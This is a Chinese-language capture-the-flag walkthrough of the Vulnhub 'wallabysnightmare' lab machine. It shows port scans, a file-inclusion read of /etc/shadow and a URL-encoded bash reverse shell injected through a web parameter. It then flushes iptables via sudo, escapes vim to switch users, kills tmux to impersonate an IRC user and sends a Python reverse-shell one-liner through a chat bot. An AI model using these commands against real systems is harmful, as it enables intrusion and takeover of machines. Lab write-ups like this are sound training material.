[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE

2024-07-06 303 0

信息收集

Server IP Address Opening Ports
192.168.8.105 TCP:22,80,6667,60080

$ nmap -p- -sC -sV 192.168.8.105 --min-rate 1000 -Pn

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图

基础Shell

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图1

http://192.168.8.105/?page=../../../../../etc/shadow

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图2

当再次尝试访问已经关闭

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图3

$ nmap -p- -sC -sV 192.168.8.105 --min-rate 1000 -Pn

开放端口60080

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图4

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图5

$ arjun -u http://192.168.8.105:60080

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图6

还是之前的page参数

$ dirb "http://192.168.8.105:60080/?page="

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图7

http://192.168.8.105:60080/?page=mailer

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图8

$ dirb "http://192.168.8.105:60080/?page=mailer&mail="

再次通过爆破,发现参数dir有变化

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图9

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图10

反弹shell

http://192.168.8.105:60080/?page=mailer&mail=%2fbin%2fbash+-c+%27bash+-i+%3E%26+%2fdev%2ftcp%2f192.168.8.107%2f10032+0%3E%261%27

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图11

Local.txt 截屏

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图12

Local.txt 内容

96e9dd72f028f2b2c894852ee056eb91

权限提升

清除防火墙规则

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图13

查看 IP 表规则

这里有两种方法
1.利用chisel端口转发绕过防火墙策略
2.直接关闭防火墙过滤规则

$ sudo /sbin/iptables -L

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图14

$ sudo /sbin/iptables --flush

重置规则

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图15

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图16

IRC 聊天&假冒用户waldo提升至Wallaby用户

使用irssi连接聊天服务

Irssi 是一个文本模式的 IRC(Internet Relay Chat)客户端程序,主要设计用来在命令行界面下进行 IRC 聊天。它是一个开源软件,支持多平台(如 Linux、Unix、Windows 等),并且提供了丰富的插件和脚本支持,使用户可以根据自己的需求进行定制和扩展。Irssi 主要用于在终端或者通过 SSH 连接的方式进行 IRC 聊天,适合那些喜欢命令行界面或者需要在服务器上进行 IRC 聊天的用户。

$ irssi -c 192.168.8.105

/list

列出聊天列表

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图17

/join #wallabyschat

加入频道

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图18

.run,要求我们必须是waldo

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图19

使用vim将身份切换到waldo

$ sudo -u waldo /usr/bin/vim /etc/apache2/sites-available/000-default.conf
:!bash

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图20

提升稳定的终端

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图21

有一个tmux会话连接到irc服务器

手动结束进程,冒充waldo进入聊天室

$ ps aux | grep tmux

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图22

$ pkill -9 tmux

终止所有关于tmux的进程

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图23

/nick waldo

替换昵称

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图24

.run python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.8.107",10033));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图25

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图26

同样ssh免密登录
[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图27

Proof.txt 截屏

[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE插图28

Proof.txt 内容

d41d8cd98f00b204e9800998ecf8427e


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论